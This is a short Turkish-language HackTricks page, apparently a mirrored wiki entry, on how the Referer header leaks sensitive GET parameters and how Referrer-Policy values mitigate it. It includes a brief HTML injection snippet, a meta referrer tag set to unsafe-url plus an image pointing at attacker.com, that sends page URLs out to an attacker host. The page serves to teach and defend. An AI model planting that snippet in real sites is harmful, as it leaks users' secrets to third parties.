Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-22 12:43:23 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/todo/interesting-http.md

3.6 KiB
Raw Blame History

{% hint style="success" %} AWS Hacking'ı öğrenin ve uygulayın: HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)
GCP Hacking'ı öğrenin ve uygulayın: HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)

HackTricks'i Destekleyin
{% endhint %}

Referans başlıkları ve politika

Referrer, tarayıcıların önceki ziyaret edilen sayfayı belirtmek için kullandığı başlıktır.

Hassas bilgiler sızdırıldı

Eğer bir web sayfasının içinde herhangi bir noktada GET isteği parametrelerinde hassas bilgiler bulunuyorsa, sayfa harici kaynaklara bağlantılar içeriyorsa veya bir saldırgan kullanıcıyı saldırganın kontrol ettiği bir URL'yi ziyaret etmeye ikna edebiliyorsa (sosyal mühendislik), hassas bilgileri en son GET isteği içinde dışarıya çıkarabilir.

Hafifletme

Tarayıcının diğer web uygulamalarına hassas bilgilerin gönderilmesini önleyebilecek bir Referrer politikası izlemesini sağlayabilirsiniz:

Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url

Karşı Önlem

Bu kuralı geçersiz kılmak için bir HTML meta etiketi kullanabilirsiniz (saldırganın bir HTML enjeksiyonu yapması gerekmektedir):

<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">

Savunma

Asla URL'deki GET parametreleri veya yollarda hassas veri bulundurmayın.

{% hint style="success" %} AWS Hacking'i öğrenin ve uygulayın:HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)
GCP Hacking'i öğrenin ve uygulayın: HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)

HackTricks'i Destekleyin
{% endhint %}